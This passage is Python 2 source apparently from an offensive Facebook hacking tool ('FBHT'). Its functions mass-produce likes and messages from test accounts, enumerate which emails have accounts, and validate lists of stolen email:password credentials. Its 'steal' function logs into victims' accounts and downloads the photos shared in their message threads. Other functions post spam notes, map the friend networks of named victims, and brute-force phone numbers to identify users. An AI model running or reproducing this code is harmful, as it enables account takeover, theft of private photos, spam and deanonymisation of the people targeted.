'__dyn' : '7w86i1PyUnxqnFwn8',
'__req' : 'a',
'ttstamp' : '26581698582558910610211811276',
'__rev' : '1262776'
}
datos = urlencode(arguments)
try:
response = br.open('https://developers.facebook.com/apps/async/test-users/edit/?app_id='+appID+'&test_user_id='+str(persona[0]),datos)
except:
print 'error'
except:
print 'Error General'
def likeDev(postId):
signal.signal(signal.SIGINT, signal_handler)
try:
masterCookie = cj._cookies
massLoginTest()
if len(cookieArray) == 0:
print 'First you must create accounts: option 1) '
quantity = raw_input('Insert the amount of likes: ')
while int(quantity) <= 0 or int(quantity) >= len(cookieArray):
print 'Wrong quantity. First you must create enough accounts for that amount of likes .. (option 1) ..'
quantity = raw_input('Insert the amount of likes: ')
percentage = 0.0
j = 0.0
total = int(quantity) * len(postId)
print '\r \r',
for i in range(int(quantity)):
for post in range(len(postId)):
cj._cookies = cookieArray[i]
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'like_action' : 'true',
'ft_ent_identifier' : str(postId[post]),
'source' : '0',
'client_id' : str(c_user)+'%3A4047576437',
'rootid' : 'u_0_2o',
'giftoccasion' : '',
'ft[tn]' : '%3E%3D',
'ft[type]' : '20',
'nctr[_mod]' : 'pagelet_timeline_recent',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8ahyj35ym3KiA',
'__req' : 'c',
'fb_dtsg' : fb_dtsg,
'phstamp' : '165816595797611370260',
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/ufi/like.php',datos)
if globalLogging:
logs(response.read())
percentage = (j * 100.0)/total
flush()
print '\r[%.2f%%] of likes completed\r' %(percentage),
j+=1
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Unknown error'
cj._cookies = masterCookie
raw_input('Finished like() module, press enter to continue')
except signalCaught as e:
deleteUser()
message = '%s catch from create module' %e.args[0]
logs(str(message))
print '%s \n' %message
raw_input('Press enter to continue')
return
def massMessage(page,message):
import random
massLoginTest()
if len(cookieArray) == 0:
print 'First you must create accounts: option 1) '
return
pageID = getUserID(page)
for i in range(len(cookieArray)):
try:
cj._cookies = cookieArray[i]
c_user = getC_user()
print str(c_user)+'\n'
numero = ''
numero2 = ''
for i in range(10):
numero += str(random.randrange(0,10))
for i in range(10):
numero2 += str(random.randrange(0,10))
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][author]' : 'fbid:'+c_user,
'message_batch[0][timestamp]' : '1401416840784',
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : '11:27pm',
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_cleared]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][is_spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : message,
'message_batch[0][has_attachment]' : 'false',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:'+pageID,
'message_batch[0][specific_to_list][1]' : 'fbid:'+c_user,
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1401416840784:'+numero+'-'+numero2+'@mail.projektitan.com>',
'''<1401416840784:[email protected]>','''
'message_batch[0][client_thread_id]' : 'user:'+pageID,
'client' : 'mercury',
'__user' : c_user,
'__a' : '1',
'__dyn' : '7n8ajEAMCBynUKt2u6aOGeExEW9ACxO4pbGA8AGGBy6C-Cu6popDFp4qu',
'__req' : 'q',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '26581697273111715585898748',
'__rev' : '1268876'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
logs('Error en el modulo de massMessage()')
print 'Error en el modulo de massMessage()\n'
def logTestUser(testUser):
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
c_user = getC_user()
arguments = {
'user_id' : testUser,
'__user' : c_user,
'__a' : '1',
'__dyn' : '7w86i3S2e4oK4pomXWo4CE-',
'__req' : '2',
'ttstamp' : '2658172826512290796710073107',
'__rev' : '1270592',
'fb_dtsg' : fb_dtsg,
}
datos = urlencode(arguments)
response = br.open('https://developers.facebook.com/checkpoint/async/test-user-login/dialog/',datos)
dump = json.loads(response.read().strip("for (;;);"))
line = dump['jsmods']['markup'][0][1]['__html']
match= re.search('\"n\"',line)
if match != None:
matchBis = re.search('value=\"',line[match.end():])
matchBisBis = re.search('"',line[match.end()+matchBis.end():])
code = line[match.end()+matchBis.end():match.end()+matchBis.end()+matchBisBis.start()]
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments['fb_dtsg'] = fb_dtsg
arguments['n'] = str(code)
datos = urlencode(arguments)
response = br.open('https://developers.facebook.com/checkpoint/async/test-user-login/',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
def massLoginTest():
import copy
i = int(0)
people = database.getUsersNotLogged()
print '\r \r',
masterCj = copy.deepcopy(cj._cookies)
loadPersistentCookie()
for person in people:
try:
cj._cookies = copy.deepcopy(masterCj)
if person[4] == 0:
logTestUser(str(person[0]))
cookieArray.append(cj._cookies)
print cj._cookies
cj.clear()
i+=1
percentage = (i * 100.0) / len(people)
flush()
print '\rCompleted [%.2f%%]\r'%percentage,
except:
print 'Error with user %s' %person[0]
continue
cj.clear()
savePersistentCookie()
def plotDOT(victim):
root = 'dumps'
directory = victim
mkdir(directory,root)
graph = open(root+"\\"+directory+"\\"+victim+"_graph.dot","wb")
graph.write("Graph {\n")
victim = victim.replace(".","_")
nodes = database.getNodes(victim)
for node in nodes:
graph.write(" "+victim.replace("_",".")+" -> "+node[0]+";\n")
edges = database.getEdges(victim,node[0],node[1])
try:
edgeList = edges[0][2].split(';')
writed = []
for individual in edgeList:
if individual != "" and individual not in writed:
graph.write(" "+node[0]+" -> "+str(individual)+";\n")
writed.append(individual)
except:
print 'No edges for %s' %node[0]
graph.write("}")
graph.close()
def dotFileDatabase(victim, transitive):
percentage = 0.0
friendships = []
visited = []
try:
result = coreFriendshipPrivacy(victim,transitive)
except:
print 'Check the internet connection please..'
return
transitivo = getName(transitive)
transitivoID = getUserID(transitive)
if transitivoID == -1:
transitivoID = transitivo
database.addNode(victim,transitivo, transitivoID)
for individuos in result:
friendName = getName(individuos)
friendId = getUserID(individuos)
if friendId == -1:
friendId = friendName
database.addNode(victim,friendName, friendId)
database.addEdge(victim,transitivo, transitivoID, friendName, friendId)
friendships.append(individuos)
i = 0.0
print '\r \r',
for friends in friendships:
percentage = (i * 100.0)/len(friendships)
flush()
print '\rIterating on %d of %d - [%.2f%%] completed\r' %(i ,len(friendships), percentage),
i+=1
if friends not in visited:
state = True
while state == True:
try:
result = coreFriendshipPrivacy(victim,friends)
state = False
except signalCaught as e:
state = False
print 'Signal Caught handler'
print '%s ' %e.args[0]
return
except:
logs('Check the internet connection please.. Press enter when it\'s done')
print '\r \r',
a = raw_input('\rCheck the internet connection please.. Press enter when it\'s done\r')
if a == 1:
state = False
else:
if a == 2:
email,password = setMail()
login(email,password,'real')
friendName = getName(friends)
friendId = getUserID(friends)
if friendId == -1:
friendId = friendName
database.addNode(victim,friendName, friendId)
for element in result:
if element not in friendships:
friendTran = getName(element)
friendTranId = getUserID(element)
if friendId == -1:
friendId = friendName
database.addNode(victim,friendTran, friendTranId)
database.addEdge(victim,friendName, friendId, friendTran, friendTranId)
friendships.append(element)
visited.append(friends)
def simpleDotGraphDatabase(friends, victim):
for friend in friends:
try:
mutual = coreFriendshipPrivacy(victim, friend)
except:
continue
transitive = getName(friend)
transitiveID = getUserID(friend)
if transitiveID == -1:
transitiveID = transitive
database.addNode(victim,transitive, transitiveID)
for element in mutual:
mutualFriend = getName(element)
mutualFriendID = getUserID(element)
if mutualFriendID == -1:
mutualFriendID = mutualFriend
database.addNode(victim,mutualFriend, mutualFriendID)
database.addEdge(victim,transitive, transitiveID, mutualFriend, mutualFriendID)
def friendlyLogout(noteID,privacy):
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
return
existence = raw_input("Share an existent infected note? 1|0: ")
title = raw_input('Note title: ')
content = ''
for i in range(0,10):
content += '<p><img src="http://www.facebook.com/n/?home.php&clk_loc=5&mid=72b01a8G5af400143243G0Gd4&bcode=1.1354826874.AbllucLcWqHQbSNM&n_m=hackedby@chinoogawa-'+str(i)+'"/></p>'
arguments = {
'fb_dtsg' : fb_dtsg,
'object_id' : noteID,
'note_id' : noteID,
'id' : getC_user(),
'title' : title,
'note_content' : content,
'audience['+noteID+'][value]' : privacy,
'publish' : 'Publish',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7n8ahyj34fzpQ9UoHaEWy1m9ACwKyaF3pqzCAjFDxCm6qyE',
'__req' : '7',
'ttstamp' : '2658169897154120115496511690',
'__rev' : '1224624'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/notes/edit',datos)
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the friendlyLogout module')
print '\rError in the friendlyLogout module\r'
raise
arguments = {
'fb_dtsg' : fb_dtsg,
'app_id' : '2347471856',
'redirect_uri' : 'https://www.facebook.com/',
'display' : 'popup',
'access_token' : '',
'sdk' : '',
'from_post' : '1',
'e2e' : '{"submit_0":1409803100561}',
'xhpc_context' : 'home',
'xhpc_ismeta' : '1',
'xhpc_timeline' : '',
'xhpc_targetid' : getC_user(),
'xhpc_publish_type' : '1',
'xhpc_message_text' : '#FBHT rocks! #HackThePlanet! @chinoogawa powered by @MkitArgentina ',
'xhpc_message' : '#FBHT rocks! #HackThePlanet! @chinoogawa powered by @MkitArgentina ',
'is_explicit_place' : '',
'composertags_place' : '',
'composertags_place_name' : '',
'tagger_session_id' : '1409803081',
'action_type_id[0]' : '',
'object_str[0]' : '',
'object_id[0]' : '',
'og_location_id[0]' : '',
'hide_object_attachment' : '0',
'og_suggestion_mechanism' : '',
'og_suggestion_logging_data' : '',
'icon_id' : '',
'share_action_properties' : '{"object":"https:\/\/www.facebook.com\/notes\/'+getName(getC_user())+'\/'+noteID+'\/'+noteID+'"}',
'share_action_type_id' : '400681216654175',
'composertags_city' : '',
'disable_location_sharing' : 'false',
'composer_predicted_city' : '',
'audience[0][row_updated_time]' : '1409803103',
'audience[0][custom_value]' : privacy,
'audience[0][value]' : '111',
'__CONFIRM__' : '1',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : '7xu5V84Oi3S2e4oK4pomXWomwho4a',
'__req' : '7',
'ttstamp' : '26581715110910598979511876122',
'__rev' : '1398396'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/v1.0/dialog/share/submit',datos)
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the friendlyLogout module')
print '\rError in the friendlyLogout module\r'
raise
def takePhotos(threads):
r = open(os.path.join("massive","fotos.txt"),"wb")
fb_dtsg = set_dtsg()
f = open(os.path.join("massive",threads),"r")
threadList = []
while True:
linea = f.readline()
if not linea:
break
threadList.append(str(linea.strip("\n")))
i = 0
for message in threadList:
arguments = {
'thread_id' : message,
'offset' : '0',
'limit' : '30',
'__user' : getC_user(),
'__a' : '1',
'__dyn' : 'aJj2BW9t2lm9b88DgDDx2IGAKh9VoW9J6yUgByVbFkGQhbHz6C-CEy5pokAWAVbGFQiuaBKAqhB-imSCiZ3oyq4U',
'__req' : '40',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '265816973899779122887410295',
'__rev' : '1458973'
}
datos = urlencode(arguments)
try:
response = br.open('https://www.facebook.com/ajax/messaging/attachments/sharedphotos.php',datos)
text = response.read()
r.write(text + '\n')
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in robo de fotos')
print '\rError in robo de fotos\r'
raise
try:
to_parse = str(text).strip('for (;;);')
resultado = json.loads(to_parse)
URLS = []
for element in resultado['payload']['imagesData'].keys():
URLS.append(resultado['payload']['imagesData'][element]['URI'])
for URL in URLS:
fotos = open(os.path.join('massive','photos',str(int(time()))+'.jpg'),"wb")
handler = br.open(URL)
fotos.write(handler.read())
fotos.close()
i += 1
URLS[:]
except:
print 'no attachment in thread'
r.close()
def accountexists(mailList):
password = '#FBHTEnumerateUsers'
mails = []
try:
mailFile = open(os.path.join("PRIVATE",mailList),"r")
except:
print 'File %s doesn\'t exist' %mailList
return
try:
verified = open(os.path.join("PRIVATE","existence","verified.txt"),"a")
verified.close()
except:
verified = open(os.path.join("PRIVATE","existence","verified.txt"),"w")
verified.close()
while True:
line = mailFile.readline()
if not line: break
mails.append(line.strip('\n'))
mailFile.close()
driver = webdriver.Firefox()
for email in mails:
driver.delete_all_cookies()
driver.get("https://www.facebook.com/")
assert "Facebook" in driver.title
elem = driver.find_element_by_name("email")
elem.send_keys(email)
elem = driver.find_element_by_name("pass")
elem.send_keys(password)
elem.send_keys(Keys.RETURN)
try:
line = driver.page_source
match = re.search('Por favor, vuelve a introducir tu contrase',line)
if match is not None:
print email + ' Cuenta existente :D !!'
verified = open(os.path.join("PRIVATE","existence","verified.txt"),"a")
verified.write(email + '\n')
verified.close()
else:
print email + ' Cuenta inexistente :('
except:
logs('Fatal error while submitting the login form')
print '\rFatal error while submitting the login form\r'
driver.close()
verified.close()
def checkLogin(mailList):
global blocked
try:
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"a")
except:
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"w")
try:
mails = open(os.path.join("PRIVATE",mailList),"r")
except:
print '%s doesn\'t exist in PRIVATE folder' %mailList
verified.close()
return
credenciales = {}
while True:
email = mails.readline()
if not email: break
index = email.find(":")
if index != -1:
credenciales[email[0:index]] = email[index+1:].strip('\n')
credentials = credenciales.keys()
shuffle(credentials)
for emails in credentials:
try:
if (login(emails,credenciales[emails],'real') != -1) or (blocked == 1):
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"a")
verified.write(emails+':'+credenciales[emails]+'\n')
verified.close()
print emails + ' valid email and passowrd!!! MOTHER KAKERRRRR :D '
blocked = 0
else:
print emails + ' not valid email or password'
except signalCaught as e:
print 'Signal caught'
return
except:
continue
try:
verified.close()
except:
return
def steal():
global blocked
try:
verified = open(os.path.join("PRIVATE","loggedin","Loggedin.txt"),"r")
except:
print 'File Loggedin.txt not found in loggedin folder, you should try it again!'
return
credenciales = {}
while True:
email = verified.readline()
if not email: break
index = email.find(":")
if index != -1:
credenciales[email[0:index]] = email[index+1:].strip('\n')
for emails in credenciales.keys():
if (login(emails,credenciales[emails],'real') != -1) or (blocked == 1):
print emails + ' valid email and passowrd!!! MOTHER KAKERRRRR :D '
if blocked == 1:
blocked = 0
print 'Account valid, but blocked due to location issues'
else:
check = checkPrivacy('me')
username = checkMe("me")
friendList, friendsName = friendshipPlot(check,username)
fileThreads = open(os.path.join("massive","threads.txt"),"wb")
for friends in friendList:
fileThreads.write(friends+'\n')
fileThreads.close()
takePhotos("threads.txt")
else:
sleep(10)
print emails + ' not valid email or password'
def getUserIDS(username):
usernameAndID = {}
usernamesFile = open(os.path.join('dumps',username,username+"UserNames.txt"),"r")
userIDSFile = open(os.path.join('dumps',username,username+"UserIDS.txt"),"w").close()
userIDS = []
usernames = []
percentage = 0.0
i = 0
while True:
linea = usernamesFile.readline()
if not linea:
break
usernames.append(linea.strip('\n'))
total = len(usernames)
for user in usernames:
flush()
percentage = (100.0 * i)/total
print '\rCompleted [%.2f%%]\r'%percentage,
userIDSFile = open(os.path.join('dumps',username,username+"UserIDS.txt"),"a")
userID = getUserID(user)
userIDS.append(userID)
try:
userIDSFile.write(userID+'\n')
usernameAndID[userID+'\n'] = user
except:
print 'unknown error'
userIDSFile.close()
i += 1
pickle.dump( usernameAndID , open(os.path.join('dumps',username,username+"UserNamesIDindexed.txt"),"wb"))
def sendPrivateMessage(message,buddy):
c_user = getC_user()
try:
fb_dtsg = set_dtsg()
if (fb_dtsg == 0):
print 'ERROR MOTHER FUCKER -_-'
arguments = {
'message_batch[0][action_type]' : 'ma-type:user-generated-message',
'message_batch[0][thread_id]' : '',
'message_batch[0][author]' : 'fbid:'+c_user,
'message_batch[0][author_email]' : '',
'message_batch[0][coordinates]' : '',
'message_batch[0][timestamp]' : str(int(time())),
'message_batch[0][timestamp_absolute]' : 'Today',
'message_batch[0][timestamp_relative]' : getTime(),
'message_batch[0][timestamp_time_passed]' : '0',
'message_batch[0][is_unread]' : 'false',
'message_batch[0][is_forward]' : 'false',
'message_batch[0][is_filtered_content]' : 'false',
'message_batch[0][is_filtered_content_bh]' : 'false',
'message_batch[0][is_filtered_content_account]' : 'false',
'message_batch[0][is_filtered_content_quasar]' : 'false',
'message_batch[0][is_filtered_content_invalid_app]' : 'false',
'message_batch[0][is_spoof_warning]' : 'false',
'message_batch[0][source]' : 'source:titan:web',
'message_batch[0][body]' : message,
'message_batch[0][has_attachment]' : 'false',
'message_batch[0][html_body]' : 'false',
'message_batch[0][specific_to_list][0]' : 'fbid:' + buddy,
'message_batch[0][specific_to_list][1]' : 'fbid:' + c_user,
'message_batch[0][force_sms]' : 'true',
'message_batch[0][ui_push_phase]' : 'V3',
'message_batch[0][status]' : '0',
'message_batch[0][message_id]' : '<1394766424499:[email protected]>',
'message_batch[0][client_thread_id]' : 'user:'+str(c_user),
'message_batch[0][manual_retry_cnt]' : '0',
'client' : 'web_messenger',
'__user' : c_user,
'__a' : '1',
'__dyn' : 'aKTyBW8BgBlyibgggDDzbHaF8x9DzECQHyUmyVbGAGQi8VpCC-KGBxmm6oxpbGES5V8Gh6VEChyd1eFEsz-dCxK9xibyfCChQEjkwzyAAEnhRGeKmhmKVRz9Hxmi8V9-i78',
'__req' : '1w',
'fb_dtsg' : fb_dtsg,
'ttstamp' : '2658171975212154891167782118',
'__rev' : '1925563'
}
datos = urlencode(arguments)
response = br.open('https://www.facebook.com/ajax/mercury/send_messages.php',datos)
if globalLogging:
logs(response.read())
except mechanize.HTTPError as e:
print e.code
except mechanize.URLError as e:
print e.reason.args
except:
print 'Ctrl+c SIGNAL Caught\n'
return
def sendBroadcast(online):
print 'Cookies will be saved and deleted after execution'
try:
driver = webdriver.Firefox()
driver.get("https://www.facebook.com/")
cookies = pickle.load(open("cookies.pkl", "rb"))
for cookie in cookies:
driver.add_cookie(cookie)
open("cookies.pkl", "wb").close()
driver.get("https://m.facebook.com/buddylist.php?ref_component=mbasic_home_header&ref_page=/wap/home.php&refid=8")
assert "Active Friends" in driver.title
data = driver.page_source
driver.close()
buddies = MyParser.parseOnline(data)
if len(buddies) == 0:
print 'Mmm houston we have a problem.. ERROR'
return
message = raw_input('Enter the message to send: ')
percentage = 0.0
i = 0
for buddy in buddies:
flush()
percentage = (100.0 * i)/len(buddies)
print '\rCompleted [%.2f%%]\r'%percentage,
sendPrivateMessage(message, buddy)
i += 1
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
logs('Error in the sendBroadcast module')
print '\rError in the sendBroadcast module\r'
raise
def getFriends(username):
mkdir(username,'dumps')
friends = []
next = username+'?v=friends'
driver = webdriver.Firefox()
driver.get("https://www.facebook.com/")
cookies = pickle.load(open("cookies.pkl", "rb"))
for cookie in cookies:
driver.add_cookie(cookie)
open("cookies.pkl", "wb").close()
while next != -1:
driver.get("https://m.facebook.com/"+next)
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
data = driver.page_source
list, next = MyParser.parseFriends(data)
friends += list
usernames = open(os.path.join('dumps',username,username+"UserNames.txt"),"w")
for friend in friends:
usernames.write(friend+'\n')
usernames.close()
driver.close()
def bruteforceCel(first,start,end):
c_user = getC_user()
try:
f = open( os.path.join("cellphones","cellphones.txt"),"a" )
f.close()
except:
f = open( os.path.join("cellphones","cellphones.txt"),"wb" )
f.close()
percentage = 0.0
verified = 0
for cellphone in range(int(start),int(end)):
percentage = ((cellphone-int(start)) * 100.0) / (int(end) - int(start))
flush()
print '\rCompleted [%.6f%%] - %d cellphone - %d verified\r' %(percentage, cellphone, verified),
try:
response = br.open('https://www.facebook.com/typeahead/search/facebar/query/?value=["'+first+str(cellphone)+'"]&context=facebar&grammar_version=7466c20ac89f47d6185f3a651461c1b1bac9a82d&content_search_mode&viewer='+c_user+'&rsp=search&qid=8&max_results=10&sid=0.24097281275317073&__user='+c_user+'&__a=1&__dyn=7nmajEyl2qm9udDgDxyIGzGpUW9ACxO4p9GgyimEVFLFwxBxCbzESu49UJ6K59poW8xHzoyfw&__req=1o&__rev=1536505')
text = response.read()
json_dump = json.loads(text.strip('for (;;);'))
f = open( os.path.join("cellphones","cellphones.txt"),"a" )
f.write(first + str(cellphone)+' '+str(json_dump['payload']['entities'][0]['path']) + ' ' + str(json_dump['payload']['entities'][0]['uid'])+'\n')
f.close()
verified += 1
except mechanize.HTTPError as e:
logs(e.code)
print e.code
except mechanize.URLError as e:
logs(e.reason.args)
print e.reason.args
except:
f.close()
continue
